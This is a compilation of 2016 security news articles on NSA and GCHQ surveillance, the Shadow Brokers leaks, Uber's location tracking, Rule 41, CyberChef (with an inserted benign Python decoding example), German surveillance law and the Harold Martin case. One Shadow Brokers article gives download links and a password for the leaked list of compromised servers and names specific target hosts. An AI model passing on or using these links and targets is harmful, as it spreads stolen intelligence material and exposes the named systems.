Remember The Shadow Brokers?
The hacker group is believed to be behind the high-profile cyber theft of NSA hacking tools and exploits, a theft that sparked a larger debate on the Internet concerning the abilities of US intelligence agencies and their own security.
The group put the stolen cyber weapons up for auction but received little response and went quiet for some time.

However, The Shadow Brokers now appears to have put up the NSA's hacking tools and exploits for direct sale on an underground website.
A newly uncovered site reportedly contains a file signed with the cryptographic key of The Shadow Brokers, suggesting the hacker group has now moved to sell NSA hacking tools directly to buyers one by one, Motherboard reports.
On Wednesday, someone going by pseudonym Boceffus Cleetus published a post on Medium, saying that the Shadow Brokers hackers are now selling "NSA tools individually."
"The site also lets visitors download a selection of screenshots and files related to each item," notes Joseph Cox of Motherboard. "Along with those is a file signed with a PGP key with an identical fingerprint to that linked to the original Shadow Brokers dump of exploits from August."
The blog post titled "Are the Shadow Brokers selling tools on ZeroNet?" reports a list of items, supposedly for sale on ZeroNet by the Shadow Brokers, with titles like "ENVOYTOMATO, EGGBASKET, and YELLOWSPIRIT."


ZeroNet is a decentralized Internet-like network for hosting websites using blockchain cryptography as DNS servers and BitTorrent technology as file servers.
Each of the items (NSA hacking tools) on the site is categorized into a type — like "exploits," "Trojans," and "implant" — and each is priced from 1 to 100 Bitcoins (from $780 to $78,000).
Anyone, including state-sponsored hackers with national funding, could buy all the exploits for around $780,000.


Uber Now Tracks Your Location Even After Your Ride
9.12.2016 thehackernews BigBrothers
Uber was embroiled in controversy in the middle of this year for monitoring the battery life of its users' phones, as the company believed that users were more likely to pay a much higher price to hire a cab when their phone's battery was close to dying.
Uber is now tracking you even when your ride is over, and, according to the ride-hailing company, the surveillance will improve its service.
Uber recently updated its app to collect user location data in the background.
So, if you have updated your Uber app recently, your app's location tracking permissions have changed, allowing the app to monitor your location before and five minutes after your trip ends, even if you have closed the app.
A popup in the Uber app will ask you, "Allow 'Uber' to access your location even when you are not using the app?" You can click "Allow" or "Don't Allow" in response to this request. If you don't allow it, Uber won't track you.
According to the company, this information not only helps drivers find riders without making phone calls, but also lets Uber monitor driver service, making sure riders are picked up and dropped off on the proper side of the street in order to enhance safety.
Here's what Uber said in a statement:
"We're always thinking about ways we can improve the rider experience from sharpening our ETA estimates to identifying the best pick up location on any given street. Location is at the heart of the Uber experience, and we're asking riders to provide us with more information to achieve these goals."
Location data during a trip is collected during the following time periods:
When you're interacting with Uber and the app is foregrounded and visible.
When you are on a trip: from the time you request a trip until the trip is ended or canceled by the driver, even if the app is running in the background, but not visible to you.
Up to 5 minutes after the driver ends a trip, even if the Uber app is in the background.
Uber announced the move last year, which prompted a complaint [PDF] to the Federal Trade Commission. At the time, the Electronic Privacy Information Center said that "this collection of user's information far exceeds what customers expect from the transportation service."
It is unexpected for a big company like Uber "to collect location information when customers are not actively using the app." However, "the FTC failed to act, and Uber is now tracking users non-stop."
How to Stop Uber From Tracking Your Location
If you are worried, there's a way to get around it. The company also explains how to turn this feature off. Here's what to do to shut down this feature:
For Android Users: Settings → Apps → Uber → scroll to "Permission" → toggle "Location."
For users running Android Lollipop (5.1) and earlier: Settings → Location → toggle Off.
For iOS Users: Settings → Privacy → Location Services → Uber → choose "Never."
For more information on the feature, you can refer to the updated data collection agreement published by Uber.


Thieving Magpie allows NSA spies to snoop on in-flight mobile calls
9.12.2016 securityaffairs BigBrothers

The Thieving Magpie programme allows the NSA and the GCHQ to intercept data from passengers traveling on board commercial aircraft.
This isn’t a sci-fi movie: the GCHQ and the NSA have spied on air passengers using in-flight GSM mobile services for years.

The news emerged from documents leaked by Edward Snowden and recently published by The Intercept.

Today, approximately 100 companies permit the in-flight use of mobile devices.

Passengers of the principal airlines (British Airways, Virgin Atlantic, Lufthansa, and many Arab and Asian companies) can access in-flight GSM mobile services using the system designed by the UK company AeroMobile and SitaOnAir. The passengers connect to the on-board GSM servers that communicate with satellites operated by British firm Inmarsat.

The spy agencies could target in-flight passengers through the “Thieving Magpie” programme. The system allows spying on victims even when they are not using their mobile devices for calls or any data transfer; it is sufficient that the phone is switched on and registered with the in-flight GSM service.

Below is an excerpt from the presentation:

“If a target’s phone is switched on, it will attempt to register to its home network that it is using the OnAir service even if they don’t actually make/receive a call.
Registration requests can be combined with the right number/callsign of the aircraft
Available in near real time (approximately 10 minute delay)”
According to the presentation leaked by Snowden, the GCHQ and the NSA are able to intercept the transmission from the satellites to the ground stations.

Thieving Magpie allowed the intelligence agencies to spy on flights in Europe, the Middle East, and Africa, but according to the presentation, it was designed for global surveillance.

The surveillance program allows data collection in “near real time,” and spies can track an aircraft every two minutes while it is in flight.

The Thieving Magpie program allows spying on any data sent via the GSM network: the cyber spies could gather e-mail addresses, Facebook IDs, and Skype addresses. It also allows monitoring of Twitter, Google Maps, BitTorrent, and VoIP.

According to Le Monde, the CIA was especially interested in Air France and Air Mexico flights, because they are potential targets for terrorists.

“We can read that, as from the end of 2003, ‘the CIA considered that Air France and Air Mexico flights were potential targets for terrorists’,” states the article published by Le Monde. “The legal department of the NSA stated at this point ‘there is absolutely no legal problem in targeting aircraft from these two companies abroad’ and ‘they should be kept under strict surveillance from the point at which they enter American air space’.”


Uber asks to track your location even when you’re not using the app
5.12.2016 securityaffairs BigBrothers

The latest update to the Uber app raises serious concerns because it asks to track users’ location even after they have been dropped off and exited the app.
The latest update to the Uber app allows it to track passengers’ locations even after they have been dropped off, while the application is running in the background of the customer’s smartphone. With this new feature, the application is able to track a passenger for up to five minutes after a trip has finished.

uber privacy

Before this upgrade, Uber was able to follow its passengers only while they had the app open.
According to Uber, the new feature has been implemented to help drivers and passengers locate each other. A representative of the company explained that the upgrade will improve the user experience by sharpening ETA estimates.

“We do this to improve pickups, drop-offs, customer service, and to enhance safety. Trip Related Location Data is collected during the following times:

– When you are interacting with the Uber app and the app is foregrounded and visible.
– When you’re on a trip: from the time you request a trip until when the trip is ended or cancelled by the driver, even if the Uber app is running in the background and not visible to you.
– Up to five minutes after the driver ends a trip, even if the Uber app is in the background.” reads the statement published by Uber on its website.

In any case, you still have the ability to choose whether to share your data, by setting the information sharing option to “Always” or “Never.”
Be aware that if you choose “Never,” you will have to enter the pick-up and drop-off locations manually every time you take a ride.

Unsurprisingly, the upgrade has sparked heated debate among privacy advocates in the US.

The Electronic Privacy Information Center promptly filed a complaint with the US Federal Trade Commission for what it considers an “unfair and deceptive trade practice.”


Rule 41 — FBI Gets Expanded Power to Hack any Computer in the World
1.12.2016 thehackernews BigBrothers
Hacking multiple computers across the world just got easier for the United States intelligence and law enforcement agencies from today onwards.
The changes introduced to the Rule 41 of the Federal Rules of Criminal Procedure by the United States Department of Justice came into effect on Thursday, after an effort to block the changes failed on Wednesday.
The change grants the FBI much greater powers to hack into multiple computers within the country, and perhaps anywhere in the world, with just a single warrant authorized by any US judge (even magistrate judges). Usually, magistrate judges only issue warrants for cases within their jurisdiction.
That is what the FBI did in its 2015 investigation into the child pornography site Playpen, in which the agency hacked into some 8,700 computers across 120 different countries.
The Supreme Court approved the changes to Rule 41 in April, allowing any U.S. judge to issue search warrants that give the FBI and law enforcement agencies authority to remotely hack computers in any jurisdiction, or even outside the United States.
Democratic Senator Ron Wyden attempted three times to block the changes to Rule 41, which potentially put at risk people using Tor, a VPN, or other anonymizing software to hide their whereabouts, but the efforts were blocked by Republican Senator John Cornyn of Texas.
The rule change should take effect on 1st December, today, barring surprises.
On the one hand, privacy advocates and legal experts have described the rule change as the extensive expansion of extraterritorial surveillance power that will allow agencies like the FBI to carry out international hacking operations with a lot less of a hassle.
On the other hand, the DOJ argued that the changes to the rule will help investigate modern Internet criminals by allowing investigators to access computers whose locations are "concealed through technological means," like the Tor anonymity network or VPNs (Virtual Private Networks), and devices used in botnets, which have become powerful cyber weapons.
Assistant Attorney General Leslie Caldwell addressed these concerns in a blog post published last week, saying that if a criminal suspect is using Tor or a VPN to hide their real location, it becomes tough for investigators to know their current location.
"So in those cases, the Rules do not clearly identify which court the investigators should bring their warrant application to," Caldwell said.
But what would happen if the FBI hacks the botnet victims, rather than the perpetrators? Or what if the government abuses this power to target nation states?
In a speech, Wyden said that the changes to Rule 41 amounted to "one of the biggest mistakes in surveillance policy in years," giving federal investigators "unprecedented authority to hack into Americans' personal phones, computers, and other devices," Reuters reports.
Other critics worry that the changes to Rule 41 would give the FBI unfettered ability to hack innocent users whose electronic devices have been infected with botnet malware without their knowledge, or anyone who keeps their identities private online.
To this concern, Caldwell argued that investigators accessing the devices of botnet victims "would, typically, be done only to investigate the extent of the botnet," or in order to "obtain information necessary to liberate victims’ computers from the botnet."
Caldwell further argued that the rule change would not allow the FBI to conduct "Mass Hacking;" in fact, failing to implement the rule change "would make it more difficult for law enforcement to combat mass hacking by actual criminals."


GCHQ presents CyberChef, an Open Source Data Analysis Tool
30.11.2016 securityaffairs BigBrothers
The GCHQ has released the code of a new open source web tool dubbed CyberChef, specifically designed for analyzing and decoding data.
Open data is a privileged source for intelligence agencies, and almost every government is investing heavily in technology to analyze it.

Recently the British intelligence Agency, the Government Communications Headquarters (GCHQ), has launched a new open source web tool specifically designed for analyzing and decoding data.

The tool dubbed CyberChef has been presented by the GCHQ as the “Cyber Swiss Army Knife.”

“CyberChef is a simple, intuitive web app for carrying out all manner of “cyber” operations within a web browser. These operations include creating hexdumps, simple encoding like XOR or Base64, more complex encryption like AES, DES and Blowfish, data compression and decompression, calculating hashes and checksums, IPv6 and X.509 parsing, and much more.” reads the description published by the GCHQ on GitHub.

“The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years. Every effort has been made to structure the code in a readable and extendable format, however it should be noted that the analyst is not a professional developer and the code has not been peer-reviewed for compliance with a formal specification.”

cyberchef-gchq

A key strength is its user-friendly interface: even non-technical users can work with encryption, compression and decompression, and data formats through simple drag-and-drop operations.

CyberChef is a powerful tool for data analysis that could be used by many categories of users, including mathematicians, data analysts, developers and even casual puzzle solvers.

According to the GCHQ, CyberChef runs in Chrome and Firefox; the Agency expects that contributors will soon make it possible to run it in Microsoft Edge as well.

The tool could be used to manipulate different types of data, decode Base64 strings, convert data from a hexdump and perform many other operations.

The GCHQ released the source code of the tool on GitHub along with a demo, and is inviting the developer community to contribute to the improvement of the tool.

“It is hoped that by releasing CyberChef through Github, contributions can be added which can be rolled out into future versions of the tool, and is an excellent example of GCHQ providing a platform on which to base cybersecurity operations,” GCHQ said.
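The core idea behind the tool described above is a "recipe": an ordered list of operations, each consuming the previous one's output. As an added illustration (not CyberChef's own code; the operation names, the argument format and the sample input are constructed for this example), the runner below chains From Base64, XOR and To Hexdump and rejects unknown steps and malformed input instead of silently passing them through.

```python
# Minimal recipe runner in the style of chained CyberChef operations.
# Added illustration; operation names and sample data are constructed.
import base64
import hashlib
from typing import Callable, Dict, List, Tuple

# Every operation takes the current bytes plus its arguments and returns bytes.
Operation = Callable[[bytes, dict], bytes]


def from_base64(data: bytes, args: dict) -> bytes:
    # validate=True rejects stray characters instead of silently dropping them.
    return base64.b64decode(data, validate=True)


def to_base64(data: bytes, args: dict) -> bytes:
    return base64.b64encode(data)


def xor(data: bytes, args: dict) -> bytes:
    # Repeating-key XOR: the key bytes are reused cyclically over the input.
    key = args["key"]
    if not key:
        raise ValueError("XOR key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def sha256(data: bytes, args: dict) -> bytes:
    return hashlib.sha256(data).hexdigest().encode("ascii")


def to_hexdump(data: bytes, args: dict) -> bytes:
    # Classic dump: 8-digit offset, hex bytes, printable ASCII between bars.
    width = args.get("width", 16)
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk).ljust(width * 3 - 1)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}  {hexpart}  |{asc}|")
    return "\n".join(lines).encode("ascii")


OPERATIONS: Dict[str, Operation] = {
    "From Base64": from_base64,
    "To Base64": to_base64,
    "XOR": xor,
    "SHA256": sha256,
    "To Hexdump": to_hexdump,
}

Recipe = List[Tuple[str, dict]]


def bake(recipe: Recipe, data: bytes) -> bytes:
    """Apply each (operation name, args) step in order and return the result."""
    for name, args in recipe:
        try:
            op = OPERATIONS[name]
        except KeyError:
            raise ValueError(f"unknown operation: {name!r}") from None
        data = op(data, args)
    return data


# Constructed sample: "hello" base64-encoded. XOR with 0x20 flips ASCII case,
# so the recipe below recovers b"HELLO".
SAMPLE = b"aGVsbG8="
RECIPE: Recipe = [
    ("From Base64", {}),
    ("XOR", {"key": b"\x20"}),
]


def decode_sample() -> bytes:
    return bake(RECIPE, SAMPLE)


def hexdump_sample() -> str:
    return bake(RECIPE + [("To Hexdump", {})], SAMPLE).decode("ascii")


if __name__ == "__main__":
    print(decode_sample())
    print(hexdump_sample())
```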


FBI Hacked into 8,000 Computers in 120 Countries Using A Single Warrant
24.11.2016 thehackernews BigBrothers
The FBI hacked into more than 8,000 computers in 120 different countries with just a single warrant during an investigation into a dark web child pornography website, according to newly published court filings.
This FBI's mass hacking campaign is related to the high-profile child pornography Playpen case and represents the largest law enforcement hacking campaign known to date.
The warrant was initially issued in February 2015 when the FBI seized the Playpen site and set up a sting operation on the dark web site, in which the agency deployed malware to obtain IP addresses from the site's alleged visitors.
The piece of malware used by the FBI is known as a Network Investigative Technique (NIT). The malware was used for at least 13 days to break into the computer of users who visited certain threads on Playpen and then sent their IP addresses back to the bureau.
Earlier this year, court documents related to the Playpen case revealed that the FBI hacked over 1,000 alleged visitors of Playpen in the U.S. using a single warrant, along with computers in Australia, Chile, Colombia, Austria, Denmark, Greece, the UK, Turkey, and Norway during the investigation.
However, a new federal court hearing transcript from a related case reveals that the hack went much further and wider than previously believed, and that the bureau actually hacked into more than 8,000 users' computers across 120 different countries.
"We have never, in our nation's history as far as I can tell, seen a warrant so utterly sweeping," federal public defender Colin Fieman said in a court hearing at the end of October, according to the transcript.
According to the transcript, the FBI also hacked what has been described as a "satellite provider." "So now we are into outer space as well," Fieman said.
"The fact that a single magistrate judge could authorise the FBI to hack 8,000 people in 120 countries is truly terrifying," Christopher Soghoian, a principal technologist at the American Civil Liberties Union (ACLU), told Motherboard.
The major controversy surrounding the Playpen case has been that Virginia-based US Magistrate Judge Theresa C. Buchanan who signed the warrant did not have the authority to authorize such searches.
The fact is that magistrate judges are a more junior type of judge who do not actually have jurisdiction to issue warrants outside their own districts. Only more senior federal judges, known as district judges, have the authority to issue such warrants under Rule 41.
However, this would likely change with the changes introduced to the Rule 41 of the Federal Rules of Criminal Procedure by the US Department of Justice.
Changes to Rule 41 will Further Expand FBI's Mass Hacking Capabilities
The changes to Rule 41 will grant the FBI much greater powers to hack into any computer within the country, and perhaps anywhere in the world, with just a single search warrant authorized by any US judge (even magistrate judges).
The changes in this rule are set to take effect on December 1, 2016.
"The US government wants to use an obscure procedure—amending a federal rule known as Rule 41— to radically expand their authority to hack," the Electronic Frontier Foundation (EFF) said. "The changes to Rule 41 would make it easier for them to break into our computers, take data, and engage in remote surveillance."
However, the DoJ further defended the changes to Rule 41 in a Monday blog post.
"We believe technology shouldn't create a lawless zone merely because a procedural rule has not kept up with the times," writes Assistant Attorney General Leslie R. Caldwell of the Criminal Division.
If the changes take effect, privacy activists and cybersecurity experts believe that US law enforcement will most likely use them to further expand its mass hacking capabilities.


Donald Trump will control the NSA – what this means for your privacy
18.11.2016 securityaffairs BigBrothers

Earlier this week, Donald Trump won a stunning election victory that will put him in charge of the world’s most powerful mass surveillance infrastructure.
Regardless of which side of the political spectrum you are on, Trump’s control over the NSA is now an indisputable fact, and we think it is worth taking a closer look at what this means. It is important to note that as a Swiss company which benefits from Swiss government support, ProtonMail follows the Swiss policy of neutrality. We do not take any position for or against Trump, nor any position for or against any particular country or government. We believe privacy is a universal value, so we do not take any sides.

However, given America’s significant influence on the world, and the large number of ProtonMail users who come from the US, we are not a disinterested party. Furthermore, we realise that the implications of a Trump presidency also interest a large proportion of the ProtonMail community, so we are here today to offer our unbiased opinion.

How much power over the NSA does Trump have?
Due to the way the US government is structured, President Trump will have a large amount of control over the NSA. The NSA is not different from any other federal agency which the president controls. The US president will be able to dictate how the agency operates through his power to appoint the NSA Director. The NSA Director needs to be confirmed through majority vote by the US Senate, but due to Republican control over the Senate, President Trump will have complete freedom to appoint anyone he wants to carry out his orders.

As a federal agency however, the activities of NSA are governed by federal law, in particular, the Foreign Intelligence Surveillance Act. However, with Republican control over both houses of Congress, President Trump would have broad power to rewrite FISA as he sees fit or introduce a new law. Of course, a new law could be subject to court challenge which could eventually work its way up to the US Supreme court, but Trump is also expected to gain control over the Supreme court. Therefore, all things considered, there is no denying that President Trump would have broad powers to re-shape the US surveillance apparatus to serve his agenda.

Should Americans Be Worried?
Since Trump’s victory, the number of new users coming to ProtonMail has doubled compared to the previous week. Many of our new users have voiced a few common concerns, both on Twitter and in emails to us. Given Trump’s campaign rhetoric against journalists, political enemies, immigrants, and Muslims, there is concern that Trump could use the new tools at his disposal to target certain groups. As the NSA currently operates completely out of the public eye with very little legal oversight, all of this could be done in secret.

protonmail-trump
ProtonMail new user signups doubled immediately after Trump’s election victory.

It is not Trump’s fault
It is tempting to blame all this on Trump and his supporters, but that is taking the easy way out. All Trump does is put a new face on the existing privacy problem, so now it concerns a segment of the population that previously didn’t care as much. ProtonMail users have always come from both the left and right side of the political spectrum. Today, we are seeing an influx of liberal users, but ProtonMail has also long been popular with the political right, who were truly worried about big government spying, and the Obama administration having access to their communications. Now the tables have turned.

The same terror the political right has experienced is now being felt in liberal bubbles such as Silicon Valley for the first time. The left is correct to be terrified of a Trump-led NSA snooping on their communications, especially since Silicon Valley giants like Google and Facebook can be forced to spy on users on behalf of Trump’s NSA. However, this precedent was not set by Trump – he hasn’t even taken office yet. The first major incident of a US tech giant being complicit in US government spying actually took place in 2015 under the Obama administration.

Privacy is something we must all champion
One of the problems with having a technological infrastructure that can be abused for mass surveillance purposes, is that governments can and do change, quite regularly in fact. This demonstrates that privacy isn’t just a liberal or conservative issue, it is something that we all need to champion, regardless of our political leanings. This is why ProtonMail is committed to building a safe haven for all people in the world, regardless of nationality, political views, or religious beliefs.

The only way to protect our freedom is to build technologies, such as end-to-end encryption, which cannot be abused for mass surveillance. Governments can change, but the laws of mathematics upon which encryption is based, are much harder to change.

What can you do to protect your privacy rights?
Privacy is a non-partisan issue, and we hope politicians around the world wake up to the fact that privacy is not only essential for democracy, it is also critical for securing the growing digital economy. In the case of encrypted email services such as ProtonMail, you even get better security in addition to the privacy. Privacy is a cause that we should all be able to unify behind, regardless of political beliefs.

In the meantime, there are fortunately a growing number of services which can help to keep government spies out of your communications, so there is no need to worry regardless of who wins the election. For securing your email, ProtonMail offers free encrypted email accounts, although you can support ProtonMail by donating or upgrading to a paid account.

For defending against NSA mass surveillance, we also recommend the Signal messaging app, using a VPN service, or using an alternative search engine such as duckduckgo.com or qwant.com. But most importantly, spread the word about the dangers of mass surveillance so politicians take note and make protecting our digital rights a priority.

About the author: The ProtonMail Team



Shadow Brokers reveals list of Servers Hacked by the NSA
1.11.2016 thehackernews BigBrothers
The hacker group calling itself the Shadow Brokers, who previously claimed to have leaked a portion of the NSA’s hacking tools and exploits, is back with a Bang!
The Shadow Brokers published more files today, and this time the group dumped a list of foreign servers allegedly compromised by the NSA-linked hacking unit, Equation Group, in various countries to expand its espionage operations.
Top 3 Targeted Countries — China, Japan, and Korea
The data dump [Download / File Password: payus], which experts believe contains 306 domain names and 352 IP addresses, covers at least 49 countries. As many as 32 of the domains were run by educational institutes in China and Taiwan.
A few target domains were based in Russia, and at least nine domains include .gov websites.
The top 10 targeted countries include China, Japan, Korea, Spain, Germany, India, Taiwan, Mexico, Italy, and Russia.
The latest dump has been signed with the same key as the first Shadow Brokers dump of NSA exploits, though much remains to be done to fully validate the contents of the leaked data.
Targeted Systems — Solaris, Unix, Linux and FreeBSD
Most of the affected servers were running Solaris, Oracle's Unix-based operating system, while some were running FreeBSD or Linux.
Each compromised server was reportedly a target of INTONATION or PITCHIMPAIR, code names for cyber-espionage programs.
The data dump also contains references to a list of previously undisclosed Equation Group tools, including Dewdrop, Incision, Orangutan, Jackladder, Reticulum, Patchicillin, Sidetrack and Stoicsurgeon.
The tools mentioned above could be implants, tools or exploits used by the NSA's notorious group.
Security researcher Mustafa Al-Bassam, an ex-member of Lulzsec and the Anonymous hacking collective, said the NSA likely compromised all the servers between 2000 and 2010.
"So even the NSA hacks machines from compromised servers in China and Russia. This is why attribution is hard," Al-Bassam added.
Are Hackers trying to influence U.S. Presidential elections?
A message accompanying the leaked data dump calls for attempts to disrupt the forthcoming United States presidential election. The relevant portion of the Shadow Brokers' message reads:
"TheShadowBrokers is having suggestion. On November 8th, instead of not voting, maybe be stopping the vote all together? Maybe being grinch who stopped the election from coming? Maybe hacking election is being the best idea? #hackelection2016."
Organizations on the list can use the leaked files to determine whether they were a potential target of the NSA-linked hacking unit.
Since the records are old, many servers should by now be clean of infection. However, a brief Shodan scan of these domains indicates that some of the affected servers are still active and still running old, possibly vulnerable systems.
The latest release comes after the FBI arrested Harold Thomas Martin, an NSA contractor, who was reportedly a prime suspect in The Shadow Brokers case.


NSA Hackers The Shadow Brokers leaked another dump with NSA targets
1.11.2016 securityaffairs BigBrothers

The ShadowBrokers hacker group leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.
The notorious Shadow Brokers hacker group has posted a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The hackers disclosed a list of historic targets of the Equation Group, which includes mail providers, Chinese targets, and universities.

The Equation Group compromised the targets using the hacking tools codenamed INTONATION and PITCHIMPAIR.

The latest dump leaked by the Shadow Brokers was signed using the same key used to sign the first dump of Equation Group exploits.

The ShadowBrokers provided links to two distinct PGP-encrypted archives: the first was offered for free as proof of the hack (its passphrase was ‘auctioned’), while for the second the group requested 1 million BTC.

The first archive contains roughly 300MBs of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.

The security researcher Mustafa Al-Bassam has published an interesting post that lists all the exploits, implants, and tools for hacking firewalls (“Firewall Operations”) included in the dump.

The Equation Group’s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

The majority of the files are at least three years old; the newest timestamp dates to October 2013.

In early October, TheShadowBrokers complained that no one seemed to be bidding on their precious archive; an alleged member of the group expressed his dissent over the lack of interest in ponying up bitcoins to release the full NSA data dump.

A couple of weeks ago the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction received offers for less than two bitcoins.

Back to the present day: the ShadowBrokers published a message accompanying the latest dump.

“TheShadowBrokers is having special trick or treat for Amerikanskis tonight.” “Why is DirtyGrandpa threating CIA cyberwar with Russia? Why not threating with NSA or CyberCommand? CIA is cyber B-Team, yes? Where is cyber A-Team? Maybe threating is not being for external propaganda? Maybe is being for internal propaganda? Oldest control trick in book, yes? Waving flag, blaming problems on external sources, not taking responsibility for failures. But neverminding, hacking DNC is way way most important than EquationGroup losing capabilities. Amerikanskis is not knowing USSA cyber capabilities is being screwed? Where is being “free press”? Is ABC, NBC, CBS, FOX negligent in duties of informing Amerikanskis? Guessing “Free Press” is not being “Free as in free beer” or “Free as in free of government influence?” reads the message.

According to security experts, the list is very old. It is available at the following links:

https://mega.nz/#F!D1Q2EQpD!Lb09shM5XMZsQ_5_E1l4eQ
https://yadi.sk/d/NCEyJQsBxrQxz

Password = payus

Kevin Beaumont (@GossiTheDog), 31 Oct 2016: “The Shadow Brokers continue to grapple for publicity and money. The list of servers is 9 years old, likely no longer exist or reinstalled.” https://twitter.com/shadowbrokerss/status/792936856925143040
A close look at the dump revealed that it contains some 300 folders of files. Each file corresponds to a different domain and IP address.

The notorious expert Hacker Fantastic analyzed the dump and confirmed that it contains 306 domains and 352 IP addresses relating to 49 countries in total.

Hacker Fantastic (@hackerfantastic), 31 Oct 2016: “306 domain names, 352 ip addresses contained in @shadowbrokerss leak, mostly ASIAPAC region. descriptions here http://pastebin.com/RK73grmu”

Hacker Fantastic (@hackerfantastic), 31 Oct 2016: “There are 49 countries impacted by the Solaris attack exposed by @shadowbrokerss - vast majority of those are in ASIAPAC region.”
The dump revealed targets in Russia, China, India, Sweden, and many other countries. The Top 10 countries include also Japan and Italy.

The colleague Carola Frediani reported the presence of Italian targets, including systems at some universities, such as the Università dell’Aquila (sipralab.univaq.it; matematica.univaq.it; ns.univaq.it) and the Università degli Studi Mediterranea di Reggio Calabria (ns.ing.unirc.it).

Below is a graph from a preliminary study by the researcher Quequero (@quequero) of the addresses published by the ShadowBrokers and allegedly used by the NSA as staging servers/C&C.

(image: quequero-shadowbrokers-server-country)

The machines compromised by US intelligence may have been used to target systems worldwide and deliver exploits.

Mustafa Al-Bassam (@musalbas): “New Shadow Brokers dump contains list of servers compromised by the NSA to use as exploit staging servers.”


The German parliament passes a controversial surveillance law
25.10.2016 securityaffairs BigBrothers

The German Parliament passed a controversial surveillance law that seems to give more power to the BND intelligence agency.
The German Parliament last week approved a controversial espionage law that in theory will tighten oversight of the BND intelligence agency, but that according to privacy advocates will give more power to the authorities.

Critics focused on a controversial clause of the law that allows the BND to eavesdrop on the communications of foreign organizations and individuals, on German soil and abroad, that transit a major internet exchange point in Frankfurt.

The Frankfurt-based operator DE-CIX in September filed a suit at a court in Leipzig against the government over the new law, which it considers illegal.

The German Government maintains that the measures approved in the surveillance law will allow it to investigate online crime and terrorism.

“How do we want to find terror suspects? How do we want to detect them if not through those means?” said Clemens Binninger, a lawmaker with Chancellor Angela Merkel’s conservative party.

In the past, the BND was not authorized to spy on its own population, but the new controversial surveillance law will allow it under specific circumstances.

The BND was previously allowed to monitor up to 20 percent of the traffic at one exchange point; the new law removes that limit and gives the agency unrestricted power to monitor Internet traffic.

“The law stipulates that through this activity it cannot be ruled out that the communications of German citizens and entities could also be accidentally intercepted, a major shift for the BND, which had been forbidden from spying on Germans.” reads a post published by Reuters.

The Greens have expressed their disappointment with the law and have threatened to petition Germany’s highest court and the European Court of Justice to repeal the surveillance law.

The law is considered a serious threat to the privacy of Germans; politicians and privacy defenders fear dragnet surveillance.

Lawmaker Martina Renner of the hard-left Left party speculates that the monitoring equipment used by the BND cannot distinguish messages sent by foreigners from those sent by Germans.

Surveillance activities conducted by the BND have raised an intense debate on the domestic political front. According to revelations published by Der Spiegel, the agency supported the NSA in its global surveillance activities.

The entrance area of the headquarters of the Bundesnachrichtendienst (BND) in Pullach near Munich, photographed on Wednesday (10.05.06). Contrary to original plans, the Pullach BND headquarters will not be closed after all. The technical reconnaissance centre, with around 1,500 staff, stays in Pullach; the rest of the 6,000-strong workforce moves to Berlin.
Photo: Johannes Simon/ ddp

The BND helped the NSA monitor European politicians, and the intelligence agency targeted private companies and entities worldwide in order to establish dominance in cyberspace. Among the victims was also the German Government and its politicians, including Chancellor Angela Merkel. The German Government was shocked at the time and expressly voiced its dissent to President Obama.

The BND supported espionage operations against various targets, including the European companies EADS (the manufacturer of Airbus planes) and Eurocopter, and European politicians, including German ones.

In August, the German weekly Die Zeit disclosed documents that reveal how German intelligence struck a deal with the NSA to get access to the surveillance platform XKeyscore.

Internal documents show that Germany’s domestic intelligence agency, the Federal Office for the Protection of the Constitution (BfV), received the XKeyscore software from the NSA in return for data from Germany.

Back in 2011, the NSA demonstrated the capabilities of the XKeyscore platform to the BfV agency. After two years of negotiation, the BfV signed an agreement to receive the NSA spyware and install it to analyze metadata collected on German citizens. In return, the German agency promised to share the metadata it collected.

The NSA tool collects ‘nearly everything a user does on the internet’; XKeyscore offers the ‘widest-reaching’ collection of online data, analyzing the content of emails, social media, and browsing history.

In 2013, documents leaked by Edward Snowden explained that a tool named DNI Presenter allows the NSA to read the content of stored emails and also enables intelligence analysts to track a user’s activities on Facebook through the XKeyscore system.

According to Die Zeit, the document “Terms of Reference” stated: “The BfV will: To the maximum extent possible share all data relevant to NSA’s mission”.
The BfV neither provided the details of the agreement to Germany’s data protection commissioner nor informed the Parliamentary Control Panel.

In January, the BND resumed its internet surveillance with the support of the NSA; the activities had been suspended following the revelations about the mutual espionage. In July 2015 Wikileaks revealed extensive economic espionage conducted by the NSA in Germany, where the spies were particularly interested in the Greek debt crisis.

Back to the new German surveillance law: it bans the intelligence agency from spying on EU countries and their citizens, as well as EU institutions, except in the case of investigations into terrorist activity.

“It also requires the BND to submit requests for cooperation with other spy agencies with a parliamentary committee and bans the agency from carrying out industrial espionage.” states Reuters.

“It requires the head of the BND, the chancellor’s office and an independent panel of judges to approve strategic foreign espionage activities.”


US contractor stole an astonishing quantity of data, including Equation Group tools
21.10.2016 securityaffairs BigBrothers

The US DoJ has charged the US contractor Harold Thomas Martin with theft of secret documents and highly classified government material.
A couple of months ago, the FBI announced the arrest of an NSA contractor, Harold Thomas Martin III, over a massive secret data theft.

The US DoJ has charged Harold Thomas Martin (51) with theft of secret documents and highly classified government material.
According to a court complaint, the stolen data include source code developed by the NSA for its hacking campaigns against foreign governments.
The DoJ’s chief national security prosecutor John Carlin revealed that the US contractor was employed by Booz Allen Hamilton, the same defense contractor that employed Edward Snowden at the time the whistleblower disclosed the NSA's global mass surveillance program.
Now, according to a new court document filed this week, the FBI seized at least 50 terabytes of data that the suspect had stolen from government systems since 1996.

According to the prosecutors, Harold Thomas Martin II has stolen an ‘astonishing quantity’ of documents, a huge trove of data containing at least 500 million pages of government records, including top-secret information about “national defense.”

“The defendant violated that trust by engaging in wholesale theft of classified government documents and property — a course of felonious conduct that is breathtaking in its longevity and scale,” prosecutors said. “The defendant was in possession of an astonishing quantity of marked classified documents which he was not entitled to possess, including many marked,” “The government anticipates that the charges will include violations of the Espionage Act, an offense that carries significantly higher statutory penalties and advisory guideline ranges than the charges listed in the complaint,” prosecutors added.

